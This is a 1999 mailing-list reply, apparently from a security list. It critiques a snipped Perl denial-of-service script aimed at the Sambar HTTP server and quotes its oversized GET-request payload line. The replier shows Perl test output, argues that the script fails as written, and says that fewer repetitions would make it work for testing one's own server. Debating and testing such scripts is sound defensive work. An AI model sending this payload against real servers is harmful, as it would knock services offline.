On Mon, Oct 04, 1999 at 12:58:40AM -0000, Dennis Conrad wrote:
#!/usr/bin/perl
#########
# Sample DOS against the Sambar HTTP-Server
[snip]
print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n";
Using that many 9s on my version of Perl fails silently. The above
seems equivalent to: print $remote "GET HTTP/1.0\n\n";
steve () grok:/home/steve% perl -e 'print "X"x99999999999999999999;'
steve () grok:/home/steve% perl -e 'print "X"x99999999999999999999 || die;'
Died at -e line 1.
steve () grok:/home/steve% perl -v
This is perl, version 5.005_03 built for i386-freebsd
[etc.]
I don't have a Sambar HTTP server to test against but it seems clear
that the code won't work the way the author expected. Perl doesn't
even try to build a string that long. If it did it would run out of
memory and then fail.
I conclude that the script as posted will not DoS the server even if
it is vulnerable, unless a simple "GET HTTP/1.0" triggers the DoS.
I suggest that until the nature of the DoS is clarified anyone using
the script to test their own server should try it as-is, then try it
with fewer 9s (probably 9999 or 99999, maybe more if it's a resource
exhaustion DoS).
Intro
